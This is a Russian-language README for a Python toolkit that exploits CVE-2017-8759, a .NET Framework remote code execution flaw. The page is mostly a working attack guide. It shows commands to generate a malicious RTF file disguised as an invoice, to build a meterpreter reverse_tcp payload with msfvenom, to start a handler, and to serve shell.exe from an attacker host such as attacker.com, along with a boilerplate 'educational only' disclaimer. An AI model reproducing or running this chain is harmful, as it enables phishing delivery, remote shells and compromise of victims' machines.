
CVE-2017-8759 微软word漏洞利用脚本
Инструмент эксплуатации CVE-2017-8759 — это удобный скрипт на Python, который предоставляет пентестерам и исследователям безопасности быстрый и эффективный способ тестирования RCE Microsoft .NET Framework. Он может генерировать вредоносный RTF-файл и доставлять полезную нагрузку metasploit / meterpreter / другую полезную нагрузку жертве без сложной настройки.
Эта программа предназначена ТОЛЬКО для образовательных целей. Не используйте её без разрешения. Применяется обычный отказ от ответственности, особенно тот факт, что я (bhdresh) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Автор или любой интернет-провайдер НЕ несёт ответственности за содержание или неправильное использование этих программ или любых их производных. Используя эту программу, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), причинённый использованием этих программ, не является ответственностью bhdresh.
Наконец, это личная разработка, пожалуйста, уважайте её философию и не используйте для плохих целей!
В скрипт были добавлены следующие возможности
- Генерация вредоносного RTF-файла
- Режим эксплуатации для сгенерированного RTF-файла
Версия: Python версии 2.7.13
1) Сгенерировать вредоносный RTF-файл
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Необязательно, если используется полезная нагрузка MSF): Сгенерировать полезную нагрузку metasploit и запустить обработчик
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Запустить набор инструментов в режиме эксплуатации для доставки локальной полезной нагрузки
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
Это удобный набор инструментов для эксплуатации CVE-2017-8759 (Microsoft .NET Framework RCE)
Режимы:
-M gen Только генерация вредоносного файла
Генерация вредоносного RTF/PPSX-файла:
-w <Filename.rtf> Имя вредоносного RTF-файла (поделитесь этим файлом с жертвой).
-u <http://attacker.com/test.txt> Путь к удалённому txt-файлу. Обычно это должен быть домен или IP-адрес, где работает этот инструмент.
Например, http://attackerip.com/test.txt (Этот URL будет включён в вредоносный RTF-файл и будет запрошен, когда жертва откроет вредоносный RTF-файл).
-M exp Запустить режим эксплуатации
Эксплуатация:
-p <TCP порт: по умолчанию 80> Номер локального порта.
-e <http://attacker.com/shell.exe> Путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке, которую необходимо выполнить на цели.
-l </tmp/shell.exe> Укажите локальный путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке.